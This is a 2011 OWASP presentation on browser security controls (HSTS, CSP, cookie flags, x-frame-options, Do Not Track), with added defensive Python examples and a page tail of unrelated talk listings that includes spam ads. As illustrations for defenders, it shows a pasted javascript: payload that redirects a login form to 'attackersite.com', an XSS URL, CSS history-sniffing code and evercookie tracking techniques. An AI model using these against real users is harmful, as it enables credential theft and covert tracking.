Enabling Browser Security in Web Applications

August 25, 2011
OWASP - Michael Coates, Mozilla

Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.

The OWASP Foundation
http://www.owasp.org

About

• Michael Coates
• Senior Manager, Mozilla
• Lead of Infrastructure Security Team
• mcoates@mozilla.com
• http://blog.mozilla.com/webappsec/
• http://michael-coates.blogspot.com
• @_mwc

                                         OWASP   2
Agenda

Locking Down SSL/TLS
Stamping Out Cross Site Scripting
Socio-Technical Attacks
Privacy

Locking Down SSL/TLS

Fake certificate attack targets Facebook users in Syria (May 2011, theregister.co.uk)
How to Hijack Facebook Using Firesheep (October 2010, pcworld.com)
Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers (June 2008, wired.com)
Internet traffic was routed via Chinese servers, U.S. military sites included (November 2010, washingtontimes.com)

Risks of Insecure Communication

High likelihood of attack
  Open wifi, municipal wifi, malicious ISP
  Easy to exploit
High impact to user
  Clandestine monitoring of population
  Injection of incorrect/malicious content
  No protection from any defensive systems
  Design flaw in application

Insecure Session Management

Secure login over HTTPS
  Password submitted encrypted
Immediate redirect to HTTP
  Session ID sent cleartext <-- vulnerability point (Firesheep attack)

[Diagram: the request/response to https://site.com/login sets the session cookie; the following request to http://site.com/profile carries the same cookie in cleartext]

Insecure Redirects

User requests HTTP page, response redirects HTTPS
302 Response is HTTP <-- Vulnerability Point

[Diagram: the browser requests http://mybank.com, the 302 redirect to https://mybank.com arrives over plain HTTP, then the HTTPS page is fetched and returns 200 OK]

Secure Design for Communication

HTTP Strict Transport Security (HSTS)
  Opt-in security control
  Website instructs compatible browser to enable STS for site
HSTS Forces (for enabled site):
  All communication over HTTPS
  No insecure HTTP requests sent from browser
  No option for user to override untrusted certificates

Strict Transport Security

Browser prevents HTTP requests to HSTS site
Any request to site is “upgraded” to HTTPS
No clear text HTTP traffic ever sent to HSTS site
Browser assumes HTTPS for HSTS sites

[Diagram: the browser rewrites the http:// request to https:// before it is sent and receives 200 OK over HTTPS]

Cookie Forcing

HSTS also protects against Cookie Forcing
  An attacker who can answer a plain HTTP request to the site can set or overwrite cookies that the browser then sends to the HTTPS site; with HSTS the browser never makes that HTTP request

HSTS FAQ

Is HSTS Cert Pinning?
  No
Chicken and the Egg (the very first visit happens before the policy has been received)?
  Technically, but drastically less chance of attack
Certificate Rotation Problem?
  No - HSTS forces a valid certificate, doesn’t specify which
Browser Support
  Current: Firefox & Chrome
  https://www.owasp.org/index.php/HTTP_Strict_Transport_Security#Browser_Support

Protecting Outdated Users

HSTS supported in current browsers (Firefox, Chrome)
Older browsers all support SECURE Cookie Flag
SECURE cookie flag
  Instructs browser to only send cookie over HTTPS
  Much less (and different) protection than HSTS, but good defense in depth control

Secure Flag

SECURE Flag doesn’t prevent HTTP requests like HSTS
Just removes SECURE Cookies from HTTP request

[Diagram: the HTTPS response sets the session cookie with the Secure attribute; the later plain HTTP request is still sent, but without the cookie]

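As an added example (not from the slides), a small Python model of the three situations contrasted in the Insecure Session Management, Strict Transport Security and Secure Flag slides: what a browser puts on the wire for a link to http://site.com/profile after logging in, with no protection, with the Secure cookie flag, and with HSTS. The host, path and cookie value are constructed, and HSTS parsing covers max-age only.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit, urlunsplit


@dataclass
class Cookie:
    name: str
    value: str
    secure: bool = False    # Secure flag: only attached to HTTPS requests
    httponly: bool = False  # HttpOnly flag: not readable from document.cookie


def parse_set_cookie(header_value):
    """Parse 'NAME=VALUE; Secure; HttpOnly' into a Cookie."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {p.lower() for p in parts[1:]}
    return Cookie(name.strip(), value.strip(), "secure" in attrs, "httponly" in attrs)


def parse_hsts_max_age(header_value):
    """Return max-age (seconds) from a Strict-Transport-Security header value."""
    for directive in header_value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age":
            return int(val.strip().strip('"'))
    raise ValueError("Strict-Transport-Security requires max-age")


@dataclass
class Browser:
    """The per-site state that matters here: a cookie jar and the HSTS host list."""
    cookies: list = field(default_factory=list)
    hsts_hosts: dict = field(default_factory=dict)  # host -> max-age in seconds

    def receive_header(self, response_url, name, value):
        """Apply one response header from a page that was fetched at response_url."""
        parts = urlsplit(response_url)
        lname = name.lower()
        if lname == "set-cookie":
            self.cookies.append(parse_set_cookie(value))
        elif lname == "strict-transport-security" and parts.scheme == "https":
            # The policy is only honoured when it arrives over HTTPS; a header
            # seen on plain HTTP could have been injected by anyone on the path
            max_age = parse_hsts_max_age(value)
            if max_age == 0:
                self.hsts_hosts.pop(parts.hostname, None)  # max-age=0 clears it
            else:
                self.hsts_hosts[parts.hostname] = max_age

    def request(self, url):
        """Return (URL actually fetched, names of the cookies attached to it)."""
        parts = urlsplit(url)
        scheme = parts.scheme
        if scheme == "http" and parts.hostname in self.hsts_hosts:
            scheme = "https"  # HSTS: rewritten before any bytes leave the browser
        wire_url = urlunsplit((scheme, parts.netloc, parts.path, parts.query, parts.fragment))
        sent = [c.name for c in self.cookies if scheme == "https" or not c.secure]
        return wire_url, sent


def scenarios():
    """Login over https://site.com/login, then follow a link to http://site.com/profile."""
    login, profile = "https://site.com/login", "http://site.com/profile"
    results = {}

    # No flags, no HSTS: the cleartext request goes out carrying the session ID
    b = Browser()
    b.receive_header(login, "Set-Cookie", "SESSIONID=abc123")
    results["no_protection"] = b.request(profile)

    # Secure flag: the cleartext request still happens, the cookie stays home
    b = Browser()
    b.receive_header(login, "Set-Cookie", "SESSIONID=abc123; Secure; HttpOnly")
    results["secure_flag"] = b.request(profile)

    # HSTS: the request itself is upgraded, so the cookie only ever travels over TLS
    b = Browser()
    b.receive_header(login, "Set-Cookie", "SESSIONID=abc123; Secure; HttpOnly")
    b.receive_header(login, "Strict-Transport-Security", "max-age=31536000; includeSubDomains")
    results["hsts"] = b.request(profile)

    # An HSTS header that arrived over plain HTTP must not create a policy
    b = Browser()
    b.receive_header("http://site.com/", "Strict-Transport-Security", "max-age=31536000")
    results["hsts_over_http_ignored"] = b.request(profile)
    return results


if __name__ == "__main__":
    for label, (url, cookies) in scenarios().items():
        print(f"{label:24} -> {url}  cookies sent: {cookies}")
```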
Defensive Design

HTTP Strict Transport Security
  http://tools.ietf.org/html/draft-hodges-strict-transport-sec
Set SECURE flag for cookies
Secure application design for TLS
  https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet

Cross Site Scripting

Risks of XSS

Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004)
Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page
Business Impact:
  Compromise of user accounts
  False data displayed on website
  Remote monitoring of user actions with website
  Full attacker control of content displayed and served from website

XSS Example

(1) Attacker submits malicious code: JavaScript is entered in the "Name" field and submitted
(2) Code is now part of webpage: the script is embedded in the page's own HTML, alongside markup such as
    <div class="featured">
    <form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">
    <div>
    <input type="hidden" name="data[Login][referer]"
(3) Malicious site steals passwords & installs malware: the injected script shows a fake login form that submits to the evil site
(4) Attacker spreads malicious URL
    http://site.com/?a=%3cscript%3edocument%2e

Frustrating Problem

XSS issues can occur anywhere user data is used in a webpage
Difficult to identify all output locations
Many frameworks allow design patterns that lead to XSS issues

Content Security Policy (CSP)

CSP - New defensive control to eliminate XSS
Allows web site to specify where JavaScript can be loaded from
Injected JavaScript via XSS is rendered inert
Violations & potential XSS attacks are reported to web site for investigation

CSP Policy (response header):
  X-Content-Security-Policy: allow 'self'; img-src 'self' data:

XSS Example with CSP

(1) Attacker submits malicious code: JavaScript is entered in the "Name" field and submitted
(2) CSP prevents script execution: the injected script is still in the page's HTML, next to markup such as
    <div class="featured">
    <form action="/en-US/firefox/users/login" method="post" id="login" class="featured-inner object-lead">
    <div>
    <input type="hidden" name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" /><input
    but the browser refuses to run it
    Violation report sent to site.com/CSPalert
(3) Site safe to use

Implementing CSP

Some code changes needed to externalize JavaScript
Run CSP in report only mode to test
Enable CSP and protect users with browsers supporting CSP
Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users

CSP Violation Reporting

Violations of CSP policy reported to specified URL
Acts as XSS intrusion detection system
CSP supported in portion of site users, XSS IDS benefits all
Reported data is from client, trust accordingly

Example policy with reporting:
  X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi

CSP Violation Reporting

[Diagram: injected JavaScript triggers a CSP violation; the violation report is sent to site.com/CSPalert]

Report Includes:
  HTTP Request
  request-headers
  blocked-uri
  violation-directive
  original-policy

CSP Violation Report

[Screenshot of a CSP violation report]

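Added example (not from the slides): a minimal report-uri collector in Python that treats every report as untrusted client data and triages it, the XSS intrusion detection use the slides describe. The JSON layout (a csp-report object carrying the fields listed above) is an assumption modelled on the slide, and the sample reports are constructed.

```python
import json
from collections import Counter

MAX_REPORT_BYTES = 8 * 1024
MAX_FIELD_CHARS = 512
# Fields modelled on the slide's list; the exact JSON layout is an assumption
FIELDS = ("request", "request-headers", "blocked-uri", "violated-directive", "original-policy")
# Schemes used by browser extensions and other client-side tooling, not by the site
NOISE_PREFIXES = ("chrome-extension:", "moz-extension:", "chrome:", "about:")


def parse_report(body):
    """Parse one POSTed report body into a dict of length-capped strings.
    Everything here came from the client, so it is validated, never trusted."""
    if len(body) > MAX_REPORT_BYTES:
        raise ValueError("report too large")
    try:
        doc = json.loads(body)
    except ValueError as exc:  # json.JSONDecodeError is a ValueError
        raise ValueError("report is not valid JSON") from exc
    report = doc.get("csp-report") if isinstance(doc, dict) else None
    if not isinstance(report, dict):
        raise ValueError("missing csp-report object")
    out = {}
    for name in FIELDS:
        value = report.get(name, "")
        if not isinstance(value, str):
            raise ValueError(f"{name} must be a string")
        # Cap every field before it reaches a log or database: a hostile client
        # chooses these values and could try to flood storage or inject into logs
        out[name] = value[:MAX_FIELD_CHARS]
    return out


def triage(report):
    """Classify a parsed report: likely_xss, unexpected_script, policy_gap or noise."""
    blocked = report["blocked-uri"].strip().lower()
    words = report["violated-directive"].split()
    directive = words[0].lower() if words else ""
    if blocked.startswith(NOISE_PREFIXES):
        return "noise"
    if directive == "script-src":
        # An inline script blocked on the site's own page is the classic XSS symptom
        if blocked in ("", "self", "inline"):
            return "likely_xss"
        return "unexpected_script"  # script from a host the policy never allowed
    return "policy_gap"  # e.g. img-src blocking a hotlinked image: review the policy


def summarize(bodies):
    """Run raw report bodies through parse + triage.
    Returns (Counter of categories, number of bodies rejected as malformed)."""
    counts, rejected = Counter(), 0
    for body in bodies:
        try:
            counts[triage(parse_report(body))] += 1
        except ValueError:
            rejected += 1
    return counts, rejected


def _report(fields):
    return json.dumps({"csp-report": fields})


# Constructed sample reports, in the shape the collector would receive them
POLICY = "allow 'self'; img-src 'self' data:; report-uri http://site.com/CSPalert"
SAMPLE_BODIES = [
    # injected inline <script> blocked on the site's own page
    _report({"request": "GET /?a=%3cscript%3e HTTP/1.1", "blocked-uri": "self",
             "violated-directive": "script-src 'self'", "original-policy": POLICY}),
    # script from an outside host the policy never allowed
    _report({"request": "GET /profile HTTP/1.1", "blocked-uri": "http://attackersite.com/x.js",
             "violated-directive": "script-src 'self'", "original-policy": POLICY}),
    # hotlinked image: a gap in the policy to review, not an attack
    _report({"request": "GET /profile HTTP/1.1", "blocked-uri": "http://cdn.example.net/a.png",
             "violated-directive": "img-src 'self' data:", "original-policy": POLICY}),
    # browser extension injecting its own script into the page
    _report({"request": "GET / HTTP/1.1", "blocked-uri": "moz-extension://abc/inject.js",
             "violated-directive": "script-src 'self'", "original-policy": POLICY}),
    # malformed: csp-report is not an object
    '{"csp-report": "not an object"}',
    # malformed: wrong type in a field
    _report({"request": 42, "blocked-uri": "self"}),
]


if __name__ == "__main__":
    counts, rejected = summarize(SAMPLE_BODIES)
    print(dict(counts), "rejected:", rejected)
```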
Other CSP Benefits

Prevent ClickJacking via frame-ancestors
Control embedded frames via frame-src
Control domains for images via img-src
Control target domains via xhr-src
Enforce specific protocols (https://*.foo.com)
Future enhancement to control actions & malicious forms

Protecting Outdated Users

HTTPOnly mitigates one of XSS impacts - session hijacking
Supported in all recent browsers
Easy, opt-in security control to protect users

[Diagram: injected JavaScript tries to send Cookie: SessionID to the Attacker’s Site; the HttpOnly flag keeps the cookie out of reach of script]

Defensive Design

CSP gaining traction, potential to solve pressing web security risk
HTTPOnly flag - easy setting to add additional layer of defense
OWASP XSS Prevention Cheat Sheet
  https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

Socio-Technical Attacks “Visual Fraud”

ClickJacking

Attacker includes victim page in iframe & overlays opaque layer
Attacker’s image entices click and text interaction
Clicks are registered on victim site underneath
User inadvertently performs action at victim site

[Diagram: Attacker’s Overlay drawn on top of the Victim Site]

ClickJacking Example

[Diagram: the attacker’s page shows “Click the Bouncing Ball”; the framed victim site underneath shows “Click to follow Joe”, a “[ ] Grant Joe full profile access” checkbox and a Confirm button, positioned where the ball lands]

ClickJacking Defenses

x-frame-options header
  Full solution
  Compatible with new versions of browsers
Frame Busting Scripts
  Partial solution
  Compatible with older browsers

x-frame-options

Additional header for HTTP Response
Instructs browser to disallow framing
Two options - DENY, SAMEORIGIN

  HTTP/1.1 200 OK
  Server: Apache-Coyote/1.1
  Content-Type: text/html;
  Vary: Accept-Encoding
  Content-Length: 35236
  x-frame-options: DENY

  HTTP/1.1 200 OK
  Server: Apache-Coyote/1.1
  Content-Type: text/html;
  Vary: Accept-Encoding
  Content-Length: 35236
  x-frame-options: SAMEORIGIN

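Added example (not from the slides): a WSGI middleware in Python that emits the response headers this deck recommends (HSTS, x-frame-options, CSP with a report-uri) and adds the Secure and HttpOnly flags to every Set-Cookie, so one server-side layer covers the Defensive Design, x-frame-options and HTTPOnly slides. The header values, report URI and demo application are constructed; the X-Content-Security-Policy name and the allow directive are the pre-standard syntax the slides use.

```python
HSTS_MAX_AGE = 31536000  # one year, in seconds


def harden_set_cookie(value):
    """Add Secure and HttpOnly to a Set-Cookie value unless already present."""
    attrs = [a.strip() for a in value.split(";") if a.strip()]
    present = {a.split("=", 1)[0].lower() for a in attrs[1:]}
    if "secure" not in present:
        attrs.append("Secure")
    if "httponly" not in present:
        attrs.append("HttpOnly")
    return "; ".join(attrs)


def harden_headers(headers, *, https, report_uri, frame_policy="DENY"):
    """Return a new header list for one response.

    headers: the (name, value) pairs the application produced
    https:   whether this response is going out over TLS
    """
    if frame_policy not in ("DENY", "SAMEORIGIN"):
        raise ValueError("x-frame-options must be DENY or SAMEORIGIN")
    out, present = [], set()
    for name, value in headers:
        if name.lower() == "set-cookie":
            value = harden_set_cookie(value)
        present.add(name.lower())
        out.append((name, value))
    defaults = [
        ("X-Frame-Options", frame_policy),
        ("X-Content-Security-Policy",
         f"allow 'self'; img-src 'self' data:; report-uri {report_uri}"),
    ]
    if https:
        # Browsers only honour HSTS on HTTPS responses, so it is pointless on
        # plain HTTP; the HTTP side of the site should simply redirect to HTTPS
        defaults.append(("Strict-Transport-Security",
                         f"max-age={HSTS_MAX_AGE}; includeSubDomains"))
    for name, value in defaults:
        if name.lower() not in present:  # keep any value the app set on purpose
            out.append((name, value))
    return out


def secure_headers_middleware(app, report_uri, frame_policy="DENY"):
    """Wrap a WSGI app so every response passes through harden_headers."""
    def wrapped(environ, start_response):
        https = environ.get("wsgi.url_scheme") == "https"

        def hardened_start(status, headers, exc_info=None):
            hardened = harden_headers(headers, https=https, report_uri=report_uri,
                                      frame_policy=frame_policy)
            return start_response(status, hardened, exc_info)
        return app(environ, hardened_start)
    return wrapped


def demo_app(environ, start_response):
    """Constructed application that sets a session cookie without any flags."""
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Set-Cookie", "SESSIONID=abc123; Path=/")])
    return [b"<html>profile</html>"]


def run_once(scheme):
    """Call the wrapped demo app once and return the headers it actually sent."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, headers

    app = secure_headers_middleware(demo_app, report_uri="http://site.com/CSPalert")
    list(app({"wsgi.url_scheme": scheme, "REQUEST_METHOD": "GET"}, start_response))
    return captured["headers"]


if __name__ == "__main__":
    for name, value in run_once("https"):
        print(f"{name}: {value}")
```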
x-frame-options

Targeted site not displayed if framed
Error page displayed
Prevents ClickJacking attack

[Diagram: Attempted ClickJack, the Attacker’s Overlay over the Victim Site, and the x-f-o Result where the framed page is replaced by an error page]

Frame Busting Scripts

JavaScript within page to detect framing
Will either “bust” the frame or not display content
Not optimal solution - techniques available to bypass defense

<script>
  // if this window is not the top-level window, the page has been framed:
  // replace the framing page with this one
  if (window.top !== window.self) {
    window.top.location = window.self.location;
  }
</script>

URL Social Engineering

Lures: “Cool new hidden feature”, “Get 10 free gems for your game”

Click the square and type the secret combination

ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter

Danger of those keystrokes...

click square - selects text element
ctrl a - select all text
ctrl c - copy text (the selected text is javascript:....)
ctrl l - select location bar
ctrl v - paste text
enter - execute JavaScript

Pasted text:
  javascript:var xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("GET", document.location, false);xmlHttp.send();xmlDoc=xmlHttp.responseText;var str=xmlDoc;x.replace(/somesite.com/, "attackersite.com");document.writeln(x);

URL JavaScript

Pasted JavaScript has full control of page
Can rewrite page
Extract and send any data
No indication to user

[Before: login form (username, password, submit) on somesite.com. After: the same form, now submitting to attackersite.com]

Defense

Code Change to Browser
Remove association between javascript: & loaded document
Renders attack inert

Privacy

Your Android Phone is Tracking You (April 2011, pcworld.com)
Your iPhone Is Tracking Your Every Move (April 2011, readwriteweb.com)
Mobile-App Makers Face U.S. Privacy Investigation (April 2011, online.wsj.com)
Nissan car secretly shares driver data with websites (June 2011, theregister.co.uk)

Privacy

Business gains from gathering user data
Privacy infringement based on laws
Privacy concerns based on user expectations
Need better options for user to understand collected data, control flow and accessibility of user data

Browser Profiling

Panopticlick
  Fingerprints browser based on provided information
  Plugins installed
  Font Support
  Screen Resolution
  Time Zone

[Panopticlick result: “Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information.”]

CSS History Sniffing

Determine user’s browsing habits with CSS
Visited link styled differently than non-visited link
CSS and element inspection determines visited pages
Issue fixed March 2010

  if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {
    // link.href has not been visited
  } else {
    // link.href has been visited
  }

  http://dbaron.org/mozilla/visited-privacy

Evercookie

“Its [evercookie] goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others.”
Multiple methods of storing data on client
Could be abused for unauthorized tracking
Goal to keep user in control of data storage / tracking mechanisms

Storage mechanisms used by evercookie:
  • Standard HTTP Cookies
  • Local Shared Objects (Flash Cookies)
  • Silverlight Isolated Storage
  • Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out
  • Storing cookies in Web History
  • Storing cookies in HTTP ETags
  • Storing cookies in Web cache
  • window.name caching
  • Internet Explorer userData storage
  • HTML5 Session Storage
  • HTML5 Local Storage
  • HTML5 Global Storage
  • HTML5 Database Storage via SQLite

http://samy.pl/evercookie/

Do Not Track

Adds header DNT: 1 to all web requests
Tells websites user does not want browsing activity to be tracked

http://dnt.mozilla.org/

Permission Manager

Granular management options for user interaction with sites (about:permissions)
Control
  Location Settings
  Cookie Settings
  Popup Windows
  Offline Storage

Privacy Design

Privacy controls distinguish applications
Design with privacy in mind
Growing support for DNT

Closing

Defense In Depth
Many new security controls to enhance security
  Strict Transport Security
  Content Security Policy
  x-frame-options
  Do Not Track

Thanks!

mcoates@mozilla.com
@_mwc

IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 

Enabling Browser Security in Web Applications

  • 1. Enabling Browser Security in Web Applications August 25, 2011 OWASP Michael Coates - Mozilla Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. About • Michael Coates • Senior Manager, Mozilla • Lead of Infrastructure Security Team • mcoates@mozilla.com • http://blog.mozilla.com/webappsec/ • http://michael-coates.blogspot.com • @_mwc OWASP 2
  • 3. Agenda Locking Down SSL/TLS Stamping Out Cross Site Scripting Socio-Technical Attacks Privacy OWASP 3
  • 4. Locking Down SSL/TLS. Headlines: Fake certificate attack targets Facebook users in Syria (May, 2011 - theregister.co.uk); How to Hijack Facebook Using Firesheep (October, 2010 - pcworld.com); Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers (June, 2008 - wired.com); Internet traffic was routed via Chinese servers, U.S. military sites included (November, 2010 - washingtontimes.com) OWASP 4
  • 5. Risks of Insecure Communication High likelihood of attack Open wifi, municipal wifi, malicious ISP Easy to exploit High impact to user Clandestine monitoring of population Injection of incorrect/malicious content No protection from any defensive systems Design flaw in application OWASP 5
  • 6. Insecure Session Management: Secure login over HTTPS; password submitted encrypted; immediate redirect to HTTP; session ID sent cleartext <-- vulnerability point (Firesheep attack). Diagram: the HTTPS request/response for https://site.com/login sets the session cookie, then the HTTP request for http://site.com/profile carries that session cookie in the clear. OWASP 6
  • 7. Insecure Redirects: User requests HTTP page, response redirects to HTTPS; the 302 response is HTTP <-- Vulnerability Point. Diagram: GET http://mybank.com, 302 Redirect with Location: https://mybank.com, GET https://mybank.com, 200 response. OWASP 7
  • 8. Secure Design for Communication HTTP Strict Transport Security (HSTS) Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): All communication over HTTPS No insecure HTTP requests sent from browser No option for user to override untrusted certificates OWASP 8
  • 9. Strict Transport Security: Browser prevents HTTP requests to HSTS site; any request to site is “upgraded” to HTTPS; no clear text HTTP traffic ever sent to HSTS site; browser assumes HTTPS for HSTS sites. Diagram: the browser rewrites the HTTP GET to an HTTPS GET before it is sent, and the server answers over HTTPS with a 200 response. OWASP 9
  • 10. Cookie Forcing HSTS also protects against Cookie Forcing OWASP 10
  • 11. HSTS FAQ: Is HSTS Cert Pinning? No. Chicken and the Egg? Technically, but drastically less chance of attack. Certificate Rotation Problem? No - HSTS forces valid certificate, doesn’t specify which. Browser Support: Current: Firefox & Chrome https://www.owasp.org/index.php/HTTP_Strict_Transport_Security#Browser_Support OWASP 11
  • 12. Protecting Outdated Users HSTS supported in current browsers (Firefox, Chrome) Older browsers all support SECURE Cookie Flag SECURE cookie flag Instructs browser to only send cookie over HTTPS Much less (and different) protection than HSTS, but good defense in depth control OWASP 12
  • 13. Secure Flag: SECURE Flag doesn’t prevent HTTP requests like HSTS; just removes SECURE Cookies from HTTP request. Diagram: HTTPS request, response with Set-Cookie carrying the session ID and the Secure flag; a later HTTP request to the same site is still sent, but without the Secure cookie. OWASP 13
  • 14. Defensive Design: HTTP Strict Transport Security http://tools.ietf.org/html/draft-hodges-strict-transport-sec; Set SECURE flag for cookies; Secure application design for TLS https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet OWASP 14
  • 16. Risks of XSS Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004) Impact: Vulnerability allows attacker to change any aspect of a vulnerable web page Business Impact: Compromise of user accounts False data displayed on website Remote monitoring of user actions with website Full attacker control of content displayed and served from website OWASP 16
  • 17. XSS Example: (1) Attacker submits malicious code (javascript in the Name field, submit); (2) Code is now part of webpage (the injected script sits inside the page’s login form markup); (3) Malicious site steals passwords & installs malware (the login form now submits to evil site; install malware); (4) Attacker spreads malicious URL http://site.com/?a=%3cscript%3edocument%2e OWASP 17
  • 18. Frustrating Problem XSS issues can occur anywhere user data is used in a webpage Difficult to identify all output locations Many frameworks allow design patterns that lead to XSS issues OWASP 18
  • 19. Content Security Policy (CSP): CSP - New defensive control to eliminate XSS. Allows web site to specify where JavaScript can be loaded from. Injected JavaScript via XSS is rendered inert. Violations & potential XSS attacks are reported to web site for investigation. Example CSP Policy: X-Content-Security-Policy: allow 'self'; img-src 'self' data: OWASP 19
  • 20. XSS Example with CSP: (1) Attacker submits malicious code (javascript in the Name field, submit); (2) CSP prevents script execution (the injected script inside the page’s login form markup does not run); (3) Site safe to use. Violation report sent to site.com/CSPalert OWASP 20
  • 21. Implementing CSP Some code changes needed to externalize JavaScript Run CSP in report only mode to test Enable CSP and protect users with browsers supporting CSP Receive alerts on potential vulnerabilities in app and quickly address to protect remaining users OWASP 21
  • 22. CSP Violation Reporting: Violations of CSP policy reported to specified URL; acts as XSS intrusion detection system. Example: X-Content-Security-Policy: allow self; report-uri http://reportcollector.example.com/collector.cgi. CSP supported in portion of site users, XSS IDS benefits all. Reported data is from client, trust accordingly. OWASP 22
  • 23. CSP Violation Reporting: CSP Violation Report Includes: request, request-headers, blocked-uri, violated-directive, original-policy. Diagram: injected javascript in the HTTP request triggers a violation report sent to site.com/CSPalert. OWASP 23
  • 25. Other CSP Benefits: Prevent ClickJacking via frame-ancestors; Control embedded frames via frame-src; Control domains for images via img-src; Control target domains via xhr-src; Enforce specific protocols (https://*.foo.com); Future enhancement to control actions & malicious forms OWASP 25
  • 26. Protecting Outdated Users: HTTPOnly mitigates one of the XSS impacts - session hijacking. Supported in all recent browsers. Easy, opt-in security control to protect users. Diagram: injected javascript trying to send Cookie: SessionID to the Attacker’s Site. OWASP 26
  • 27. Defensive Design: CSP gaining traction, potential to solve pressing web security risk. HTTPOnly flag - easy setting to add additional layer of defense. OWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet OWASP 27
  • 29. ClickJacking: Attacker includes victim page in iframe & overlays opaque layer; attacker’s image and text entice click and interaction; clicks are registered on victim site underneath; user inadvertently performs action at victim site. Diagram: Attacker’s Overlay (image) on top of the Victim Site. OWASP 29
  • 30. ClickJacking Example Click the Bouncing Ball Click to follow Joe [ ] Grant Joe full profile access Confirm OWASP 30
  • 31. ClickJacking Defenses x-frame-options header Full solution Compatible with new versions of browsers Frame Busting Scripts Partial solution Compatible with older browsers OWASP 31
